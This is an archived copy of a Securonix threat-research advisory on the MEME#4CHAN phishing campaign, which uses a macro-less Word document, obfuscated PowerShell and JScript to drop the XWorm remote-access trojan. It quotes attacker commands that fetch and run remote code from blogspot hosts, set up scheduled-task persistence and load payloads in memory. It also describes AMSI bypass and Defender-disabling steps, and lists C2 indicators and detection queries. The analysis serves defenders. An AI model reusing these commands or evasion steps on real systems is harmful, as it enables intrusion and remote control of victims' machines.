www.securonix.com
Open in
urlscan Pro
2606:4700:3108::ac42:2b19
Public Scan
URL:
https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/
Submission Tags: falconsandbox
Submission: On April 18 via api from US — Scanned from DE
Submission Tags: falconsandbox
Submission: On April 18 via api from US — Scanned from DE
Form analysis 1 forms found in the DOM
https://www.securonix.com/
<form autocomplete="off" action="https://www.securonix.com/">
<div class="search-field">
<input type="text" placeholder="Search" name="s" id="search-input">
<button><i class="icon-search"></i></button>
</div>
</form>Text Content
* Blog
* Contact Us
* Request a Demo
* Products
* * Overview
* Platform
* ‘Bring Your Own’ Deployment Models
* Bring Your Own Snowflake
* Bring Your Own AWS
* * Products
* Unified Defense SIEM
* UEBA
* SOAR
* ATS
* Investigate
* Why Securonix?
* * Why Securonix?
* Threat Labs
* Analyst Resources
* Compare Us
* * Featured – Gartner® Peer Insights™ 2023 Customers’ Choice for Security
Information and Event Management
Learn More
* Solutions
* * Monitoring the Cloud
* Cloud Security Monitoring – Gain visibility to detect and respond to
cloud threats.
* Amazon Web Services – Achieve faster response to threats across AWS.
* Google Cloud Platform – Improve detection and response across GCP.
* Microsoft Azure – Expand security monitoring across Azure services.
* Microsoft 365 – Benefit from detection and response on Office 365.
* * Featured Use Case
* Insider Threat – Monitor and mitigate malicious and negligent users.
* NDR – Analyze network events to detect and respond to advanced threats.
* EMR Monitoring – Increase patient data privacy and prevent data
snooping.
* MITRE ATT&CK – Align alerts and analytics to the MITRE ATT&CK
framework.
* * Industries
* Financial Services
* Healthcare
* Resources
* * Resource Library
* Case Studies
* Resources by Topic
* SIEM
* UEBA
* Cloud Security
* Insider Threat
* Information Security
* Security Analytics
* * Featured – 2022 Gartner® Magic Quadrant™ For SIEM
Learn More
* Partners
* * Global System Integrators
* MSSPs
* Solution Providers
* Technology Alliance
* Distributors
* Partner Portal Login
* Company
* * About
* Leadership
* Newsroom
* Press
* Events
* Awards
* Blog
* Contact Us
* Request a Demo
Blog
SECURONIX THREAT LABS SECURITY ADVISORY: LATEST UPDATE: ONGOING MEME#4CHAN
ATTACK/PHISHING CAMPAIGN USES MEME-FILLED CODE TO DROP XWORM PAYLOADS
Threat Research
Share
LinkedInTwitterFacebookTeilen
By Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov
TL;DR
An unusual attack/phishing campaign delivering malware while using meme-filled
code and complex obfuscation methods continues dropping Xworm payloads for the
last few months and is still ongoing today.
INTRO
For the last few months, an interesting and ongoing attack campaign was
identified and tracked by the Securonix Threat Research team. The attack
campaign (tracked by Securonix as MEME#4CHAN) was leveraging rather unusual
meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to
infect its victims. Today, we’ll dive into this campaign by taking an in-depth
technical analysis of the entire attack chain starting with the phishing email
samples, covering obfuscation methods, and ending with an analysis of the final
binary payload that gets decoded from .NET assemblies in PowerShell.
The attack chain leveraging XWorm payloads was first reported by threat
researchers at Elastic. Today, we will take a look at some new unique payloads
along with new obfuscation methods used by the attackers that were not covered
before. We will also provide new samples, IoCs and detections which we’ve been
tracking since the start of the campaign a few months ago.
The attack begins with a malicious Microsoft Office Word document and appears to
be targeting various businesses, including Germany / .de email addresses.
Microsoft Word attachments have fallen out of favor since Microsoft decided to
disable macro execution by default, however today as we dive into one of the
samples collected, attempted code execution from a macro-less document is still
very much in use today.
ATTACK CHAIN OVERVIEW
The [MEME#4CHAN] campaign follows a rather unique attack chain consisting of
both PowerShell and JavaScript execution originating from a malicious Word
document file.
CSharp code execution contained within the main PowerShell script is used to
deliver the final payload which ends with XWorm v3.1 execution. Below is a
diagram of the overall attack chain. We will dive into each portion of the
attack chain in depth as we continue.
Figure 1: [MEME#4CHAN] attack chain
INITIAL INFECTION
As with many modern attacks we see these days, the MEME#4CHAN typically begins
with a phishing email. The attacks appear to be patterned after a known fake
hotel reservation phishing scheme. The goal is to get the company employee to
open the attached phishing document which will kick off the initial code
execution portion of the attack. Typically the subject, body and even contents
of the lure attachment are designed to create a sense of urgency to mask any
potentially unusual requests.
PHISHING EMAIL DETAILS
In one example, the phishing email contained the subject “Reservation For Room”
with a brief message in the body containing a generic text containing room and
booking requests. The email appears to be sent from “zoe[at]kbowlingslaw.com”,
however after examining the header, the actual sender came from a Gmail address:
“panelnew12[at]gmail.com”.
What makes this particular phishing campaign especially interesting is the fact
that the target email belonged to a German company involved in manufacturing.
This could indicate that the attackers are not only specifically targeting
hotels, but blasting out phishing emails using a generic corporate email list
and hoping for the best. To bolster this theory, another phishing email our team
intercepted was from the same Gmail address and contained the subject “Urgent
booking for Honeymoon” and was targeted to a small German hospital clinic.
Most of the phishing emails analyzed by the team followed the same pattern, so
we’ll dive into one of these in depth.
STAGE 1: EMAIL ATTACHMENT ANALYSIS: DETAILS FOR BOOKING.DOCX
Throughout the rest of this article, we’ll follow the attack chain of one
document, though others were overall similar and produced the same final result.
In this example, the email attachment is a single Microsoft Word document file
named “Details for booking.docx”. When opened, a prompt to the user appears
before any content is displayed asking the user if they want to update the
document with externally linked files.
Figure 2: Details for booking.docx linked files prompt
If either of the prompts are clicked, the pop-up closes and we’re presented with
what looks like stolen images of a bank debit card as well as a driver’s
license. Both cards appear to be from two unique French citizens.
The document contains no macros or discernable p-code which means that macro
execution is not the attack vector for the phishing document.
Figure 3: Details for booking.docx file contents
Rather than using macros to execute malicious VBscript, this document uses a
known vulnerability from last year (CVE-2022-30190). In summary, this
vulnerability works by embedding external objects contained in a relationship
file within the .docx word file. These relationship files can reference external
objects included inside the doc.
In this example, the document footer contained a shape object that was used
maliciously. The shape object used the footer relationship file
“footer2.xml.rels” to fetch the external objects.
Figure 4: Details for booking.docx external references
Notice on the right side of the figure above that the relationship file contains
two links to external resources.
hxxps://huskidkifklaoksikfkfijsju.blogspot[.]com/atom.xml
hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles.com/ugd/73cceb_b5b6005e2aa74cf48cd55dca1a2ff093[.]docx
The referenced file 73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx appears to be
an empty MS document file containing a single picture with a small white square.
The same code execution tactic happens again with the same referenced Blogspot
URL as the original.
The other URL contained in the original phishing document references the
atom.xml file hosted on Usrfiles, a public file sharing service. This file
redirects to another URL which downloads and executes a PowerShell script hosted
at:
hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_e5a698286daf43ac87b4544a35b1a482.txt
Some documents we observed executed PowerShell code directly contained within
the atom.xml file, while others, as with this case referenced a separate URL
containing the malicious PowerShell code.
STAGE 2: POWERSHELL EXECUTION
The PowerShell that gets executed at this stage is semi-obfuscated and contains
quite a few functions which we’ll dive into further on. The code is rather
interesting and contains memes, crass variable names and comments throughout, so
you’ll have to pardon the use of the blur tool throughout the next series of
figures as we go through it and subsequent files.
Figure 5: 73cceb_e5a698286daf43ac87b4544a35b1a482.txt – CSharp and initial
execution
The script begins by stopping the RegSvcs and Msbuild processes. We’ll get into
why this is important further down. After that, a directory inside
C:\ProgramData\ is created called MEMEMAN which is where most of the malware
staging from this point will happen.
The $NuclearDefusion variable contains a CSharp script that accomplishes a few
tasks. First, at the beginning, there is a deobfuscation function named £££
which is used to hex decode some of the other variables later on.
Two additional variables, each with their own PowerShell code are contained
inside the $amsii variable contained in the JJJI function:
$AMI: This variable contains a long hexadecimal string that is triple hex
encoded. Once decoded, we’re presented with a simple obfuscated AMSI bypass
technique which uses Matt Graeber’s reflection method to crash the AMSI
(Anti-malware Scan Interface) instance for the current PowerShell session. This
will prevent subsequent code from being scanned for malicious content.
Figure 6: $AMI – AMSI bypass techniques
Next, a registry key is created under
“HKCU:\\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32”
with a default value set to “C:\IDontExist.dll” This registry change also
assists in disabling AMSI by overriding the Microsoft Defender COM object for
AMSI and points it to a DLL that doesn’t exist.
$DEF: This variable contains PowerShell code to once again disable AMSI using
the same two methods as before, just obfuscated differently. Additionally,
defender exclusions are created for pretty much everything on the host using the
“Add-MpPreference” PowerShell module.
Figure 7: $DEF – Code samples: Disable AMSI, Defender exclusions, and new local
user
Towards the end of the script, a new local user named “System32” with a password
of 123 is created. The new local user is then added to the administrators and
Remote Desktop Users groups. And then lastly, Windows Firewall is disabled.
Moving through the Csharp script, we run into another obfuscated variable called
$CHOTAbheem which contains a long encoded string. Further down we see it
leveraging the £££ function to decode it.
Figure 8: Deobfuscated code behind $CHOTAbheemdecoded
The script above leverages the WScript.shell COM object
“{40FC6ED5-2438-11CF-A3DB-080036F12502}” to execute the $NuclearDefusion
variable which we’ll see written to disk later on. This takes us through the
first half of the original PowerShell script.
Figure 9: 73cceb_e5a698286daf43ac87b4544a35b1a482.txt – PowerShell code
The code referenced in the first half of the script is written to disk and saved
in the “C:\ProgramData\MEMEMAN” directory as “CypherDeptography.~+~” using the
PowerShell [IO.File]::WriteAllText method.
Next, let’s take a look at what’s hidden away behind the $allsave variable. Once
decoded using the same method we used to decode the $CHOTAbheem variable, we’re
faced with a hugely obfuscated JScript one-liner as seen in the figure below.
Figure 10: $allsave JScript and deobfuscated PowerShell code
Once decoded, the script behind $allsave is similar to that of $CHOTAbheem .
However this appears to invoke a variable that is referenced in the main script
which points to:
hxxps://backuphotelall.blogspot[.]com/atom.xml
Unfortunately, we were not about to pull this script as the Blogspot URL was
taken offline at some point. However, we can speculate that it is similar to
that of the original atom.xml script.
Next down the list, we’ve got a repeating function (probably for redundancy)
where the $shakalakaboomboom variable is decoded. In the end, carving through
the layers of obfuscation once again, it retrieves yet another atom.xml file
from the following URL:
hxxps://3000allfitheyito.blogspot[.]com/atom.xml
Persistence is established by writing the obfuscated JScript code to disk and
saving it as \ZeeNEWsTV\UpdateEscan.js using the WriteAllText method. A
scheduled task is then created called EscanDissldo referencing the newly created
file that runs once every 200 minutes.
schtasks /create /sc MINUTE /mo 200 /tn EscanDissldo /F /tr “wscript.exe //b
//e:jscript C:\\ProgramData\\MEMEMAN\\UpdateEscan.js”
The next level of persistence happens during the last 4 lines of code where all
of the content from the staging directory (“C:\ProgramData\MEMEMAN\“) is copied
to the user’s startup directory. This is defined using
“[environment]::getfolderpath(“Startup”)”
Lastly, the script deletes the CSharp decode script, or any file ending in *.~+~
from the startup directory.
STAGE 3: BINARY FILE EXECUTION
Circling back to the C# script portion of the original PowerShell script, there
are two variables which contain binary file data. Both are heavily obfuscated
.NET binaries which leverage the unlicenced version of .NET Reactor to hide the
original source code.
Both binary files are injected into the RegSvcs.exe or Msbuild.exe process using
in-memory execution using .NET assemblies via reflection. For reference, the
$Ripple variable contains the hexadecimal binary data for sssss.exe which we’ll
be going over further down.
Figure 11: In-memory assembly execution
There is a good amount of obfuscation in the P4 function, however once decoded
it is a bit easier to observe what the code is attempting to accomplish.
[Reflection.Assembly]::Load(“Salmankhan($pp”).GetType(“A.B”).GetMethod(C).Invoke($null,{[OBJECT[]]},
(“C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe”, $Ripple)
[Reflection.Assembly]::Load(“Salmankhan($pp”).GetType(“A.B”).GetMethod(C).Invoke($null,{[OBJECT[]]},
(“C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe”, $Ripple)
[Reflection.Assembly]::Load(“Salmankhan($pp”).GetType(“A.B”).GetMethod(C).Invoke($null,{[OBJECT[]]},
(“C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe”, $Ripple)
Based on some of the hard-coded strings, this appears to be XWorm V3.1 which
interestingly enough was recently cracked and published online.
BINARY FILE ANALYSIS: SSSSS.EXE
Since Xworm is pretty well known we won’t be diving in too deep into the binary
analysis portion.The binary file was assembled with an original file name of
sssss.exe and is hidden behind the variable $MEME2026. The variable is
essentially a long string of hexadecimal characters which when decoded make up
the entire binary file.
The executable is overall quite small, at around 85KB and was compiled using VS.
Taking a look at the metadata in the figure below it appears to pattern itself
off of what you might find for an AVG install file, though this executable was
not digitally signed.
Figure 12: sssss.exe binary file details
Once we were able to deobfuscate a majority of the script, we’re able to
determine some basic functionality. In the figure below we see some connection
parameters being defined. It establishes a connection to a remote HTTP server
using a POST request using one of three user agents chosen at random:
“Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0”
“Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15
(KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1”
“Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/60.0.3112.113 Safari/537.36”
Figure 13: sssss.exe connection parameters
A unique ID is generated using the victim’s processor count, user name, machine
name, OS Version,and drive total size. This is used to identify the victim host
from the attacker’s C2 architecture.
From a command and control standpoint, the RAT offers a large amount of
attacker-initiated commands. Below is a table of the command and a brief
description of its intended functionality.
Command Details rec Restart application CLOSE Close application Uninstall Purges
all RAT files, registry keys, scheduled tasks then exits update Runs the
uninstall function, decompresses file from byte stream, opens a new memory
stream DW Writes a .ps1 file from the attacker’s server and executes it using
the command: powershell.exe -ExecutionPolicy Bypass -File “filename.ps1” FM
Takes an assembly from a provided byte array, then creates an instance of the
assembly’s entry point type and invoke it. LN Downloads a file and executes it
using Process.Start(filename). Urlopen Performs an HTTP GET request to a
provided URL for the default browser Urlhide Same as Urlopen, but build the web
connection within the binary itself, hidden from the user PCShutdown Shuts down
the victim machine using the following command:
shutdown.exe /f /s /t 0 PCRestart Restarts the victim machine using the
following command:
shutdown.exe /f /r /t 0 PCLogoff Logs off the user using the following command:
shutdown.exe -L StartDDos Begins DDos to the target StopDDos Stops the DDos
attack StartReport This attempts to abort the existing thread and then create a
new thread for the instance with passed in parameters StopReport Stops the newly
created thread Xchat Open a socket and send specified data to the attacker’s
machine ngrok Open a socket and use ngrok functionality plugin Unknown: Appears
to check for the existence of “plugin” related data savePlugin Unknown:
processing of additional plugin-related data OfflineGet Performs connectivity
check Cap Captures the current user’s desktop MessageBox Sends a message to the
logged in user using MessageBox.Show();
Other functionality includes clipboard monitoring, command shell, DOS
capabilities, disable/enable UAC, and the ability to throw a BSOD.
In addition to the functionality above, the RAT also leverages WMI objects to
pull additional data such as antivirus information, date and time information.
While the connection strings were heavily obfuscated within the executable,
dynamic analysis provided a connection with the following information:
212.87.204[.]83:3000
Port3000newspm.duckdns[.]org
SOME POSSIBLE ATTRIBUTION INSIGHTS
The attack methodology is similar to that of TA558 where phishing emails were
delivered targeting the hospitality industry. TA558 also typically uses a wide
range of C2 campaign artifacts and payloads similar, but not positively in line
with what we witnessed through the MEME#4CHAN campaign.
Based on the English meme-themed code and 4chan references, it’s likely that the
malicious threat actor originates from a group of English-speaking origin, such
as the UK or US. Some of the malicious attack activity appears to be targeting
victims in Germany.
ADDITIONAL SAMPLE ANALYSIS
In addition to the attack chain above beginning with Details for booking.docx,
the Securonix Threat Research team also identified other connected samples,
including:
Document C2 Infrastructure Autorização do documento.docx
hxxps://www.mediafire[.]com/file/t820jnuwf9mri17/excelDNALibrary-AddIn64-packed.xll/file
hxxps://urlintimacygoombguch.blogspot[.]com/atom.xml
Passport and Id for booking details.docx
hxxps://www.mediafire.com/file/giv692dqvctosb3/50002023[.]txt/file
POST EXPLOITATION ANALYSIS AND OBSERVATIONS
We observed the attackers execute the following commands on our system. As you
can see, executed commands originated from the RegSvcs.exe process, confirming
the in-memory injection techniques seen in the original PowerShell script.
Process Command Line winword.exe winword.exe /n
“c:\users\[redacted]\downloads\autorização do documento.docx” /o “”
explorer.exe c:\windows\explorer.exe mshta.exe
c:\windows\system32\mshta.exe -embedding svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -p regsvcs.exe powershell.exe -ep
bypass -c (i’w’r(‘hxxps://powpowpowff.blogspot[.]com/atom.xml’) -useb) |
.(‘{1}{0}’-f’ex’,’i’) | ping 127.0.0.1 schtasks.exe Schtasks.exe /create /sc
minute /mo 120 /tn escansupdate /f /tr “wscript.exe //b //e:jscript
c:\\programdata\\REDACTED\\windowsdefenderupdate.js” powershell.exe
“c:\windows\system32\windowspowershell\v1.0\powershell.exe” -ep bypass -c
(i’w’r(‘hxxps://powpowpowff.blogspot[.]com/atom.xml’) -useb) |
.(‘{1}{0}’-f’ex’,’i’) | ping 127.0.0.1
C2 AND INFRASTRUCTURE
Much of the infrastructure used in the MEME#4CHAN campaign was hosted from
public file sharing services such as usrfiles and mediafire. Additionally,
atom.xml files on random blogspot domains were used. Some either redirected to a
.txt file containing malicious PowerShell code while others contained the
PowerShell code directly.
The following IP addresses and domains were observed as a part of the overall C2
infrastructure during [MEME#4CHAN] campaign.
C2 and Network IoCs
hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx
hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_16620dd76e094b4888c85467a58e79df.txt
hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_e5a698286daf43ac87b4544a35b1a482.txt
hxxps://529f38d0-3744-4286-b484-be860d475d25.usrfiles[.]com/ugd/529f38_41875cf4c8844415994858b3623063f9.txt
https://42502d2a-e7ed-4a16-9f11-33ffe6c54021.usrfiles.com/ugd/42502d_fb4a2f640cf14ab2a8bcbde16bd178ba.txt
hxxps://powpowpowff.blogspot[.]com/atom.xml
hxxps://huskidkifklaoksikfkfijsju.blogspot[.]com/atom.xml
hxxps://backuphotelall.blogspot[.]com/atom.xml
hxxps://3000allfitheyito.blogspot[.]com/atom.xml
hxxps://urlintimacygoombguch.blogspot[.]com/atom.xml
hxxps://port5000duki.blogspot[.]com/atom.xml
hxxps://bakc5002.blogspot[.]com/atom.xml
hxxps://billielishhui.blogspot[.]com/atom.xml
hxxps://doccallingupdate.blogspot[.]com/atom.xml
hxxps://urlpropogationintimitacyi[.]blogspot.com/atom.xml
hxxps://www.mediafire[.]com/file/t820jnuwf9mri17/excelDNALibrary-AddIn64-packed.xll/file
hxxps://www.mediafire.com/file/giv692dqvctosb3/50002023[.]txt/file
hxxps://www.mediafire[.]com/file/q1zrci43zt8hlix/7000.txt/file
hxxps://www.mediafire[.]com/file/79jzbqigitjp2v2 port3000newspm.duckdns[.]org
212.87.204[.]83:3000
CONCLUSION
The [MEME#4CHAN] campaign provided us with some interesting insights. Though
phishing emails rarely use Microsoft Office documents since Microsoft made the
decision to disable macros by default, today we’re seeing proof that it is still
important to be vigilant about malicious document files, especially in this case
where there was no VBscript execution from macros.
It’s likely that since several C2 domains are still active that this campaign is
ongoing. Also, given the fact that XWorm v3.1 was recently cracked and released,
it’s likely that activity surrounding this particular strain will only increase.
SECURONIX RECOMMENDATIONS AND MITIGATIONS
* Avoid opening any attachments especially from those that are unexpected or
are from outside the organization. Be extra vigilant with Microsoft document
files, even if there are no macros present.
* Implement an application whitelisting policy to restrict the execution of
unknown binaries.
* Deploy additional process-level logging such as Sysmon and PowerShell logging
for additional log detection coverage.
* Monitor for the usage of potentially malicious file hosting websites such as
mediafire and usrfiles.
* Securonix customers can scan endpoints using the Securonix Seeder Hunting
Queries below.
MITRE ATT&CK MATRIX
Tactic Technique Initial Access T1566: Phishing
T1566.001: Phishing: Spearphishing Attachment Execution T1204.002: User
Execution: Malicious File
T1059.001: Command and Scripting Interpreter: PowerShell
T1059.003: Command and Scripting Interpreter: Windows Command Shell
T1059.007: Command and Scripting Interpreter: JavaScript
T1204.001: User Execution: Malicious Link Defense Evasion T1027.010: Obfuscated
Files or Information: Command Obfuscation
T1055.009: Process Injection: Proc Memory
T1620: Reflective Code Loading Persistence T1547.001: Boot or Logon Autostart
Execution: Registry Run Keys / Startup Folder
T1053: Scheduled Task/Job Command and Control T1573.001: Encrypted Channel:
Symmetric Cryptography
T1105: Ingress Tool Transfer
T1571: Non-Standard Port Exfiltration T1041: Exfiltration Over C2 Channel
ANALYZED FILE HASHES
File Name SHA256 (IoC) Details for booking.docx
f3e6621928875a322ee7230ccf186bdaa5609118c4a6d1c2f4026adfb8e88744 Autorização do
documento.docx 9cd785dbcceced90590f87734b8a3dbc066a26bd90d4e4db9a480889731b6d29
Card & Booking Details.docx
3c3e24c01a675b3b17bee9c8f560a33c3ecca8c44442fd5b3dd8c0f4429f279b Passport and Id
for booking details.docx
6d86f36b2220e8d9580e6708856fa74f37f7aa35db1a708e17ecacf0de3d5d2e
73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx
db1185f24c56cadec1c85a33b0efeb2d803ff00abf4c9df1e00d860683068415
529f38_ab5ac880c56841bca4889e2e53082ddf.docx
41c68aecada65a15f4a8bea52cc25033a1b73ff7340cd3865d55c61ded566e81
73cceb_c6672ebf7c8e4edb9e3f2612ab056923.txt
292b5a8c61eb79633590b6b13c0b41388ccad3535b55ed822b887d6d15d61be4
73cceb_e5a698286daf43ac87b4544a35b1a482.txt
59d72ff91e94a2c762285cce3bcb3e94e8d14608c2eeecacdcd6fe720c3ad5f2
73cceb_b2df5636b5c54a73b438fa5ae338326b.txt
9419d7a578338a714f976fb2b9eb320049422ec7059cedcc4a8baf144c4df41b
73cceb_e5c443158f5b446daab366060229bc37.txt
2725a14da90a6bcbfde174df8b0e95179b617aa14ec07a2d1fc71000310ad913
73cceb_69fbb28af79141d4b6bec17ff2cf1850.txt
4746941996305743c9d0bcb96ed4b2b930355cd8782098aa5600b42131314308
73cceb_33dedbe277af4ba48b81c1486becec3e.txt
c443d754153180ebeee1106d5eecf1024e063413f3f92a29c6c95a08c6f2e633
73cceb_33dedbe277af4ba48b81c1486becec3e.txt
1005feeff2ecfe6e53f53f63a2364de8418863d83e256322ca82e939dae95e45
73cceb_a27333f1bf71425199c62379dc2c4fbf.txt
6005529195e6afac29d8c62091ee7990e92b7a80b391b03c34c8a8fbf019fce6
637c10a8-1401-4193-bede-dc80e432f3b6-dom.html
f0942afa08c509f58b4b9f02cae4581ebf712f2f1763f1a2ffb8f9d964e335ae
529f38_03f0f1ffb57c407198e05107306a4f6f.txt
d4fdc73d563605cadf1ded9b644f21e8dae0f65870890357e5bc554bbc66bf74
529f38_6521c5ccbd8d46acb81ce3eb5cc3cc56.txt
1b5ec95836cd52efa853ba3fa76d0849e4094b32048952a7ac0676d34f251776
529f38_41875cf4c8844415994858b3623063f9.txt
1ae5589b6c358ff11a9555a7265ba5f0709be7a865e2cf51af04eb17b2a2ce18
529f38_9ce24968dc7342deb680dad14f365bc5.txt
1a517a25d55aae6af13d025b1d1edee7fb185b90155f30e195f58cbf4c6b36fe
529f38_532d9fab787f45a9a533a9be38cab909.txt
d9a1c97646872be823bce7e37325f9869daa5593f3ced37024dc5188243639be
excelDNALibrary-AddIn64-packed.xll
90cb95264d0b555fe9a760de404196ac183a958c9cc1aad0689598e35fbb0c3b sssss.exe
3c45a698e45b8dbb1df206dec08c8792087619e54c0c9fc0f064bd9a47a84f16 bin.dll
4fc40af3b2e3f96e8013a7187e5cb4ce1a00a9528823f789cb8aca09c51143c6 201871865
9a7061a539333e9f833a589197a60258ebb820bba5f1f29d5b31453e8e392d0f
SOME EXAMPLE OF RELEVANT SECURONIX DETECTION POLICIES
* EDR-ALL-1038-RU
* EDR-ALL-730-ER
* EDR-ALL-30-ER
* CEDR-ALL-30-ER
* EDR-ALL-932-RU
* WEL-ALL-1070-RU
* EDR-ALL-979-RU
* EDR-ALL-351-RU
* WEL-ALL-1069-RU
* EDR-ALL-1086-RU
* EDR-ALL-1100-ER
* EDR-ALL-1215-ERR
* WEL-ALL-1186-ERR
* EDR-ALL-1209-RU
* PSH-ALL-231-RU
* PSH-ALL-227-RU
* PSH-ALL-314-RU
RELEVANT SPOTTER QUERIES
* index = activity AND rg_functionality = “Endpoint Management Systems” AND
(deviceaction = “Process Create” OR deviceaction = “Process Create (rule:
ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =
“Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed
Process”) AND (resourcecustomfield1 CONTAINS “Set-MpPreference” OR
resourcecustomfield1 CONTAINS “Add-MpPreference”) AND (resourcecustomfield1
CONTAINS “-DisableRealtimeMonitoring” OR resourcecustomfield1 CONTAINS
“-DisableBehaviorMonitoring”)
* index = activity AND rg_functionality = “Endpoint Management Systems” AND
(deviceaction = “Process Create” OR deviceaction = “Process Create (rule:
ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =
“Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed
Process”) AND destinationprocessname = “schtasks.exe” AND
(resourcecustomfield1 CONTAINS “\ProgramData\” OR resourcecustomfield1
CONTAINS “\Users\” OR resourcecustomfield1 CONTAINS “\Public\” OR
resourcecustomfield1 CONTAINS “\AppData\” OR resourcecustomfield1 CONTAINS
“\Desktop\” OR resourcecustomfield1 CONTAINS “\Downloads\” OR
resourcecustomfield1 CONTAINS “\Temp\” OR resourcecustomfield1 CONTAINS
“\Tasks\” OR resourcecustomfield1 CONTAINS “\$Recycle”)
* index = activity AND rg_functionality = “Endpoint Management Systems” AND
(deviceaction = “Process Create” OR deviceaction = “Process Create (rule:
ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =
“Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed
Process”) AND (destinationprocessname = “reg.exe” OR destinationprocessname =
“mshta.exe” OR destinationprocessname = “cscript.exe” OR
destinationprocessname = “regsvr32.exe” OR destinationprocessname =
“wscript.exe” OR destinationprocessname = “schtasks.exe”) AND
(resourcecustomfield1 CONTAINS ” Invoke-” OR resourcecustomfield1 CONTAINS
“FromBase64String” OR resourcecustomfield1 CONTAINS “New-Object” OR
resourcecustomfield1 CONTAINS ” IEX(” OR resourcecustomfield1 CONTAINS “|IEX”
OR resourcecustomfield1 CONTAINS ” bypass “)
* index = activity AND rg_functionality = “Microsoft Windows Powershell” AND
(message CONTAINS “}{0}” OR message CONTAINS “} {0}”) AND message CONTAINS ”
-f” AND (message NOT CONTAINS
“WarningWriteDownRecoveryPasswordInsertExternalKeyRestart” AND message NOT
CONTAINS “ErrorSidProtectorRequiresAdditionalRecoveryProtector” AND message
NOT CONTAINS “=\windows\sentinel\”)
* index = activity AND rg_functionality = “Microsoft Windows Powershell” AND
(message CONTAINS “System.Reflection.Assembly.Load($” OR message CONTAINS
“[System.Reflection.Assembly]::Load($” OR message CONTAINS
“[Reflection.Assembly]::Load($” OR message CONTAINS
“System.Reflection.AssemblyName” OR message CONTAINS
“Reflection.Emit.AssemblyBuilderAccess” OR message CONTAINS
“Runtime.InteropServices.DllImportAttribute”) AND (message NOT CONTAINS
“Generated by= Microsoft Corporation” AND message NOT CONTAINS “Generated by:
Microsoft Corporation”)
* (rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web
Application Firewall” OR rg_functionality = “Web Proxy”) AND
(destinationaddress = “193.149.185[.]229”)
* index = activity AND rg_functionality = “Web Proxy” AND (requesturl CONTAINS
“73cceb_” AND requesturl CONTAINS “.txt”
* index = activity AND rg_functionality = “Web Proxy” AND (requesturl CONTAINS
“powpowpowff.blogspot[.]com” OR requesturl CONTAINS
“huskidkifklaoksikfkfijsju.blogspot[.]com” OR requesturl CONTAINS
“backuphotelall.blogspot[.]com” OR requesturl CONTAINS
“3000allfitheyito.blogspot[.]com” OR requesturl CONTAINS
“urlintimacygoombguch.blogspot[.]com” OR requesturl CONTAINS
“giv692dqvctosb3/50002023[.]txt” OR requesturl CONTAINS
“port3000newspm.duckdns[.]org” OR requesturl CONTAINS
“bakc5002.blogspot[.]com” OR requesturl CONTAINS “bakc5002.blogspot[.]com” OR
requesturl CONTAINS “port5000duki.blogspot[.]com” OR requesturl CONTAINS
“bakc5002.blogspot[.]com” OR requesturl CONTAINS
“billielishhui.blogspot[.]com” OR requesturl CONTAINS
“doccallingupdate.blogspot[.]com” OR requesturl CONTAINS
“urlpropogationintimitacyi[.]blogspot.com”)
* index = activity AND rg_functionality = “Microsoft Windows Powershell” AND
message CONTAINS “WinDefend” AND message CONTAINS “Stop-Service” AND message
CONTAINS ” -StartupType” AND message CONTAINS “Disabled”
REFERENCES:
1. Elastic: Attack chain leads to XWORM and AGENTTESLA
https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla
2. Securonix Threat Labs Initial Coverage Advisory: RCE 0-Day in MS Office
(CVE-2022-30190)
https://www.securonix.com/blog/rce-0-day-in-ms-office-using-ole-object-cve-2022-30190-analysis/
3. ProofPoint: Reservations Requested: TA558 Targets Hospitality and Travel
https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel
4. BYPASSING AMSI VIA COM SERVER HIJACKING
https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
5. Reddit: XWorm v3.1 Cracked
https://www.reddit.com/r/blackhatrussia/comments/11jqko9/xworm_v31_cracked/
FacebookTwitterEmailTeilen
PREVIOUS ARTICLE
SECURONIX CHANNEL SALES DIRECTOR THERESA MARTIN NAMED TO CRN’S 2023 WOMEN OF THE
CHANNEL LIST
NEXT ARTICLE
INSIDER THREAT PROFILE CASE STUDY: [FRONTLINE FRAUDSTER] REAL-WORLD CASES IN
ACTION
RELATED RESOURCE
* Securonix Threat Research Knowledge Sharing Series:...
* Securonix Threat Research Security Advisory: Analysis...
* Securonix Threat Research Security Advisory: Analysis...
* Securonix Threat Research Security Advisory: Technical...
* Why Securonix?
* Why Securonix?
* Analyst Resources
* Overview
* Compare Us
* Products
* Platform
* Bring Your Own Snowflake
* Bring Your Own AWS
* Unified Defense SIEM
* UEBA
* SOAR
* ATS
* Investigate
* Solutions
